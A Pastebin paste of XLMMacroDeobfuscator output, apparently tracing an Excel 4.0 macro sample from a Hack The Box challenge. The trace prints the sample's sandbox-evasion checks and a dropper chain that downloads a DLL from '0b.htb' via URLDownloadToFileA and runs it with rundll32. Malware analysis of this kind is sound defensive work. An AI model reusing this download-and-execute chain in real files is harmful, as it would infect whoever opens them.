dissectmalware

XLMMacroDeobfuscator output

May 4th, 2020
597
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.99 KB | None | 0 0
  1. [Loading Cells]
  2. [Starting Deobfuscation]
  3. CELL:N545 , NotImplemented ,WORKBOOK.HIDE("c1zB0vasNO",TRUE)
  4. CELL:N546 , FullEvaluation ,GET.WORKSPACE(1)
  5. CELL:N547 , Branching ,IF(ISNUMBER(SEARCH("Windows",N546)),ON.TIME(NOW()+"00:00:02","agawf23f"),CLOSE(FALSE))
  6. CELL:N547 , FullEvaluation ,[TRUE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!D8)
  7. CELL:D8 , Branching , IF(GET.WORKSPACE(42),CONCATENATE(E394,F1194,F549,E635,O697,U208,T458,M868,Z4,U777),CONCATENATE(F394,F1194,E549,O635,U697,D777))
  8. CELL:D8 , FullEvaluation , [TRUE] " HTB{n0w_e"
  9. CELL:D9 , FullEvaluation , GET.WORKSPACE(13)
  10. CELL:D10 , FullEvaluation , GOTO(C1300)
  11. CELL:C1300 , FullEvaluation , GOTO(Q222)
  12. CELL:Q222 , Branching , IF(GET.WORKSPACE(19),ON.TIME(NOW()+"00:00:02","rstegerg3"),CLOSE(TRUE))
  13. CELL:Q222 , FullEvaluation , [TRUE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!T698)
  14. CELL:T698 , FullBranching , IF(OR(D9<700),ON.TIME(NOW()+"00:00:02",A1),ON.TIME(NOW()+"00:00:02","Lsl23Us7a"))
  15. CELL:T698 , FullEvaluation , [TRUE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!A1338)
  16. CELL:A1338 , NotImplemented , FORMULA.FILL("a",A1:Z1337)
  17. CELL:A1339 , End , HALT()
  18. CELL:T698 , FullEvaluation , [FALSE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!D1337)
  19. CELL:D1337 , FullBranching , IF(F100<300,ON.TIME(NOW()+"00:00:02",A1),ON.TIME(NOW()+"00:00:02","KsshpqC4Mo"))
  20. CELL:D1337 , FullEvaluation , [TRUE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!A1338)
  21. CELL:A1338 , NotImplemented , FORMULA.FILL("a",A1:Z1337)
  22. CELL:A1339 , End , HALT()
  23. CELL:D1337 , FullEvaluation , [FALSE] ON.TIME(NOW()+"00:00:02",'c1zB0vasNo'!D1023)
  24. CELL:D1023 , Branching , IF(ISNUMBER(SEARCH("6.1",N546)),CONCATENATE(Z699,L932,J1190,C574,J644,A718,E813),CONCATENATE(A699,E932,K1190,J574,A644,Z718,W813))
  25. CELL:D1023 , FullEvaluation , [FALSE] "A$0!(rR"
  26. CELL:D1024 , FullEvaluation , GOTO(R1186)
  27. CELL:R1186 , FullEvaluation , GET.WORKSPACE(1)
  28. CELL:R1187 , FullEvaluation , IF(NOT(ISNUMBER(SEARCH("7.0",R1186))),CLOSE(FALSE))
  29. CELL:R1188 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner",0)
  30. CELL:R1189 , FullEvaluation , CALL("Kernel32","CreateDirectoryA","JCJ","C:\rncwner\CkkYKlI",0)
  31. CELL:R1190 , FullEvaluation , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://0b.htb/s.dll","C:\rncwner\CkuiQhTXx.dll",0,0)
  32. CELL:R1191 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\rncwner\CkuiQhTXx.dll HTB{n0w_eXc3l_4.0_M4cr0s_r_b4cK}",0,0)
  33. CELL:R1192 , FullEvaluation , GOTO(A1338)
  34. CELL:A1338 , NotImplemented , FORMULA.FILL("a",A1:Z1337)
  35. CELL:A1339 , End , HALT()
  36. time elapsed: 5.1418397426605225
Add Comment
Please, Sign In to add comment